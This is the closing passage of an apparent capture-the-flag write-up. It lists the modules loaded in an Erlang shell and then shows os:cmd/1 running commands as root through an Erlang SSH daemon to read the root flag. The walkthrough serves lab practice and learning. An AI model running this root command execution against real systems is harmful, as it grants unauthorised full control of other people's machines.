inet_udp             /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_udp.beam
init                 preloaded
io                   /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io.beam
io_lib               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io_lib.beam
io_lib_format         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io_lib_format.beam
io_lib_pretty         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/io_lib_pretty.beam
kernel               /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/kernel.beam
kernel_config         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/kernel_config.beam
kernel_refc           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/kernel_refc.beam
lists                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/lists.beam
logger               /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger.beam
logger_backend       /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_backend.beam
logger_config         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_config.beam
logger_filters       /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_filters.beam
logger_formatter     /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_formatter.beam
logger_h_common       /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_h_common.beam
logger_handler_watch /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_handler_watcher.beam
logger_olp           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_olp.beam
logger_proxy         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_proxy.beam
logger_server         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_server.beam
logger_simple_h       /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_simple_h.beam
logger_std_h         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_std_h.beam
logger_sup           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/logger_sup.beam
maps                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/maps.beam
net_kernel           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/net_kernel.beam
orddict               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/orddict.beam
ordsets               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/ordsets.beam
os                   /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/os.beam
otp_internal         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/otp_internal.beam
peer                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/peer.beam
persistent_term       preloaded
prim_buffer           preloaded
prim_eval             preloaded
prim_file             preloaded
prim_inet             preloaded
prim_net             preloaded
prim_socket           preloaded
prim_tty             /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/prim_tty.beam
prim_zip             preloaded
proc_lib             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/proc_lib.beam
proplists             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/proplists.beam
pubkey_cert_records   /usr/local/lib/erlang/lib/public_key-1.17.1/ebin/pubkey_cert_records.beam
public_key           /usr/local/lib/erlang/lib/public_key-1.17.1/ebin/public_key.beam
queue                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/queue.beam
rand                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/rand.beam
raw_file_io           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/raw_file_io.beam
raw_file_io_list     /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/raw_file_io_list.beam
re                   /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/re.beam
rpc                   /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/rpc.beam
sets                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/sets.beam
shell                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/shell.beam
shell_default         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/shell_default.beam
socket_registry       preloaded
sofs                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/sofs.beam
ssh                   /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh.beam
ssh_acceptor         /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_acceptor.beam
ssh_acceptor_sup     /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_acceptor_sup.beam
ssh_app               /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_app.beam
ssh_auth             /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_auth.beam
ssh_bits             /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_bits.beam
ssh_channel_sup       /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_channel_sup.beam
ssh_cli               /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_cli.beam
ssh_client_channel   /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_client_channel.beam
ssh_connection       /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_connection.beam
ssh_connection_handl /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_connection_handler.beam
ssh_connection_sup   /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_connection_sup.beam
ssh_file             /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_file.beam
ssh_fsm_kexinit       /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_fsm_kexinit.beam
ssh_fsm_userauth_ser /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_fsm_userauth_server.beam
ssh_lib               /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_lib.beam
ssh_message           /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_message.beam
ssh_options           /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_options.beam
ssh_server_channel   /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_server_channel.beam
ssh_sftpd             /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_sftpd.beam
ssh_system_sup       /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_system_sup.beam
ssh_tcpip_forward_ac /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_tcpip_forward_acceptor_sup.beam
ssh_transport         /usr/local/lib/erlang/lib/ssh-5.2.9/ebin/ssh_transport.beam
standard_error       /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/standard_error.beam
start_escript__escri /usr/local/lib/erlang_login/start.escript
string               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/string.beam
supervisor           /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/supervisor.beam
supervisor_bridge     /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/supervisor_bridge.beam
sys_core_alias       /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/sys_core_alias.beam
sys_core_bsm         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/sys_core_bsm.beam
sys_core_fold         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/sys_core_fold.beam
unicode               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/unicode.beam
unicode_util         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/unicode_util.beam
user_drv             /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/user_drv.beam
user_sup             /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/user_sup.beam
v3_core               /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/v3_core.beam
zlib                 preloaded
ok
(ssh_runner@soulmate)4>

The os module is loaded, and because the daemon runs as root, os:cmd/1 executes commands as root:

(ssh_runner@soulmate)5> os:cmd('id').
"uid=0(root) gid=0(root) groups=0(root)\n"
(ssh_runner@soulmate)6> os:cmd('cat /root/root.txt').
"13250465961261f2fc068a043edccfff\n"
(ssh_runner@soulmate)7>

That yields root.txt.

Summary

Information gathering matters: once you have a low-privilege foothold, pay close attention to running processes and command history.
